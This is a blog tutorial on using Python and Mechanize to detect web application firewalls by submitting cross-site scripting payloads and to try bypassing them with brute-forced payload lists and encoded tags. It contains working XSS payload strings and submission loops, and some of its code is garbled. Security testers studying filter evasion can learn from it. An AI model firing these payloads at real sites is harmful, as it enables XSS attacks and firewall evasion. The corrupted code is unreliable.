Skip to main content

Use Python To Detect And Bypass Web Application Firewall

Use Python To Detect And Bypass Web Application Firewall


Web application firewalls are usually placed in front of the web server to filter the malicious traffic coming towards server. If you are hired as a penetration tester for some company and they forgot to tell you that they are using web application firewall than you might get into a serious mess. The figure below depicts the working of a simple web application firewall:


As you can see its like a wall between web traffic and web server, usually now a days web application firewalls are signature based.

What is a signature based firewall?


In a signature based firewall you define signatures, as you know web attacks follow similar patters or signatures as well. So we can define the matching patterns and block them, i.e.

Payload :- <svg><script>alert&grave;1&grave;<p>

The payload defined above is a kind of cross site scripting attack, and we know that all these attacks can contain following substring -> "<script>", so why don't we define a signature that can block a web traffic if it contains this sub string, we can define 2-3 signatures as defined below:
  1. <script>
  2. alert(*)
First signature will block any request that contains <script> substring, and second one will block alert(any text). So, this is how signature based firewall works.

How to know there is a firewall?

web-applicaion-firewall-cyberpersons
If you are performing a penetration test and you didn't know that there was a firewall blocking the traffic than it can waste a lot of your time, because most of the time your attack payloads are getting blocked by the firewall not by your application code, and you might end up thinking that the application you are testing have a secure good and is good to go. So, it is a good idea to first test for web application firewall presence before you start your penetration test.

Most of the firewalls today leave some tracks about them, now If you attack a web application using the payload we defined above and get the following response:

?
1
2
3
4
5
6
7
HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the
 
requested resource could not be found on this server. This error was generated by <strong>Mod_Security</strong>.
You can clearly see that your attack was blocked by the Mod_Security firewall. In this article we will see how we can develop a simple python script that can do this task detecting firewall and bypassing it.

Step 1: Define HTML Document and PHP Script!

We will have to define our HTML document for injection of payload and corresponding PHP script to handle the data. We have defined both of them below.
We will be using the following HTML Document:

?
1
2
3
4
5
6
7
8
<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP Script:


?
1
2
3
4
5
<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!

Our second step towards detecting the firewall presence is creating a malicious cross site scripting request that can be blocked by the firewall. We will be using a python module called 'Mechanize', to know more about this module please read the following article :


If you already know about Mechanize, you can skip reading the article. Now that you know about Mechanize, we can select the web form present on any page and submit the request. Following code snippet can be used to do that:

?
1
2
3
4
5
import mechanize as mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

Lets discuss this code line wise:
  1. On the first line we've imported the mechanize module and given it a short name 'mec' for later reference.
  2. To download a web page using mechanize, instantiation of browser is required. We've just did that in the second line of the code.
  3. On the first step we've defined our HTML document, in which the form name was 'waf', we need to tell mechanize to select this form for submission, so we've this name in a variable called formName.
  4. Than we opened this url, just like we do in a browser. After the page gets opened we fill in the form and submit data, so opening of page is same here.
  5. Finally we've selected the form using 'select_form' function passing it 'formName' variable.
As you can see in the HTML source code, that this form have only one input field, and we are going to inject our payload in that field and once we receive response we're going to inspect it for know strings to detect the presence of the web application firewall.

Step 3: Prepare the payload

In our HTML document we've specified one input field using this code:
input type="text" name="data"><br>
You can see that name of this field is 'data', we can use following bit of code to define input for this field :

?
1
2
3
crossSiteScriptingPayLoad = "<svg><script>alert&grave;1&grave;<p>"
 
maliciousRequest.form['data'] = crossSiteScriptingPayLoad
  1. First line saves our payload in a variable.
  2. In a second line of code, we've assigned our payload to a form field 'data'.
We can now safely submit this form and inspect the response.

Step 4: Submit the form and record Response

Code I am going to mention after this line will submit the form and record the response:

?
1
2
3
4
maliciousRequest.submit()
response =  maliciousRequest.response().read()
 
print response
  1. Submit the form.
  2. Save the response in a variable.
  3. Print the response back.
As I currently have no firewall installed, the response I got is :

no-web-application-firewall-present

As you can see that payload is printed back to us, means no filtering is present on the application code and due to the absence of firewall our request was also not blocked.

Step 5: Detect the Presence of firewall

Variable named 'response' contains the response we got from server, we can use the response to detect presence of firewall. We will try to detect the presence of following firewalls in this tutorial.
  1. WebKnight.
  2. Mod_Security.
  3. Dot Defender.
Let see how we can achieve this with python code:
?
1
2
3
4
5
6
7
8
9
10
if response.find('WebKnight') >= 0:
       print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
      print "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
      print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
      print "Firewall detected: Dot Defender"
else:
      print "No Firewall Present"
If Web Knight firewall is installed and our request got blocked, response string will contain 'WebKnight' inside it some where, so find function will return value greater than 0, that means WebKnight firewall is present. Similarly we can check for other 2 firewalls as well.
We can extend this small application to detect for as many number of firewalls, but you must know there response behavior.

Using Brute force to bypass Firewall filter

I've mentioned in the start of the article that mostly firewall these days block requests based on signatures. But there are hundreds and thousands of ways you can construct a payload. Java script is becoming complex day by day, we can make a list of payloads, and try each of them, record each response and check if we was able to bypass the firewall or not. Please note that if firewall rules are well defined than this approach might not work. Let see how we can brute force using python:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
listofPayloads = ['&lt;dialog open="" onclose="alertundefined1)"&gt;&lt;form method="dialog"&gt;&lt;button&gt;Close me!&lt;/button&gt;&lt;/form&gt;&lt;/dialog&gt;', '&lt;svg&gt;&lt;script&gt;prompt&amp;#40 1&amp;#41&lt;i&gt;', '&lt;a href="&amp;#1;javascript:alertundefined1)"&gt;CLICK ME&lt;a&gt;']
for payLoads in listofPayloads:
    maliciousRequest = mec.Browserundefined)
    formName = 'waf'
    maliciousRequest.openundefined"http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_formundefinedformName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submitundefined)
    response = maliciousRequest.responseundefined).readundefined)
    if response.findundefined'WebKnight') &gt;= 0:
        print "Firewall detected: WebKnight"
    elif response.findundefined'Mod_Security') &gt;= 0:
        print "Firewall detected: Mod Security"
    elif response.findundefined'Mod_Security') &gt;= 0:
        print "Firewall detected: Mod Security"
    elif response.findundefined'dotDefender') &gt;= 0:
        print "Firewall detected: Dot Defender"
    else:
        print "No Firewall Present"

  1. On the first line we've defined a list of 3 payloads, you can extend this list and add as many payloads as you require.
  2. Then inside the for loop we did the same process we did above, but this time for each payload in a list.
  3. Upon receiving response we again compare and see see if firewall is present on not.
As I've had no firewall installed, my output was:

no-firewall-present

Convert HTML Tags to Unicode or Hex Entities

If for example firewall is filtering html tags like <, >. We can send their corresponding Unicode or Hex Entities and see if they are being converted to there original form, if so, than this could be an entry point as well. Code below can be used to examine this process:

?
1
2
3
4
5
6
7
8
9
10
11
12
listofPayloads = ['&lt;b&gt;','\u003cb\u003e','\x3cb\x3e']
for payLoads in listofPayloads:
     maliciousRequest = mec.Browser()
     formName = 'waf'
     maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
     maliciousRequest.select_form(formName)
     maliciousRequest.form['data'] = payLoads
     maliciousRequest.submit()
     response = maliciousRequest.response().read()
     print "---------------------------------------------------"
     print response
     print "---------------------------------------------------"
?
1
 
Each time we will send the encoded entry and in the response we will examine if it got converted or printed back without conversion, when I ran this code I got the this output :

cross-site-scripting-encoded-html-tags

Means none of the encoded entry got converted to its original form.

Conclusion

The purpose of this article was to train you in advance so that you can penetrate your firewall before a hacker can do. It is always a good choice to self test your network infrastructure for vulnerabilities, because our first concern always is to get our application up and running and we overlook the security part. But it must not be over looked, because later it can be a huge headache.
Complete source code can be downloaded from this link.

Comments

Post a Comment

Popular posts from this blog

Can you acce Marianas web!!???

The legend of  Mariana's Web  appears to get its name from the deepest part of the ocean,  Mariana's Trench . It's supposedly the  deepest  part of the web, a forbidden place of mysterious evil or at least, that's the myths a subset of online believers has cultivated. Marianas Web, named after the deepest ocean trench on Earth. Source:   The myth of Mariana's Web The Dark Net is made for anonymity; the sharing of information without fear of detection or prosecution. Due to its nature this attract many people, both bad and good. some to speak freely of political jurisdiction and others to engage in all manners of illegal activity. Like the ‘normal’ web, Marianas web has a range of topics, but mainly illegal. And that’s exactly what Marianas Web is, its the Deepest part of the Web, where people don’t want you to go. Source: Marianas web and the other levels Some  intrepid Internet  mavericks even claim that the Marianas Web is the location of a super intel
Post a Comment
Read more

Bettercap : MITM attack for sniffing traffic and passwords

Bettercap : MITM attack for sniffing traffic and passwords Contents Installation Sniffing Traffic Getting password We will be installing Bettercap, doing a quick sniffing exercise, and then a more detailed section on grabbing the password. Will demonstrate the password grabbing on outlook.com, which seems to be particularly vulnerable to this attack. Installing bettercap Installation is simple- apt-get update apt-get dist-upgrade apt-get install bettercap The above three commands will leave you with latest versions of Kali and bettercap. PS: I am writing this tutorial from a location with slow internet connection, and hence didn't perform the dist-upgrade step. However, bettercap seems to be running  mostly  fine. There may be a few difference in what you observe and what I show in this demo due to this difference in versions. For those who want to know the versions of various utilities that I'm using, take a look below. If you are unfamiliar with
Post a Comment
Read more

Kali Installation : Dual Boot VS Live Boot VS Virtual Machine

Kali Installation : Dual Boot VS Live Boot VS Virtual Machine If you are yet to have a Kali instance running on your machine, then you have quite a dilemma ahead of you. There are three ways to go about running Kali, each with their own advantages and disadvantages. In this article, I'll tell you what exactly the terms Dual Boot, Live Boot, and Virtual machine installation mean, how easy/difficult these are to perform, and what are the advantages/disadvantages of each of them. In the end, I'll tell you how to find guides for doing all of these. PS: This guide (and the blog) is focused on Kali, but everything in this post is applicable to Linux in general. Certain parts are related to hacking, but you can take networking lessons from them regardless, even if you aren't interested in hacking per se. Dual Boot Most of you would be running a single operating system on your system right now. However, that doesn't have to be the case. We can partition our hard disk, an
Post a Comment
Read more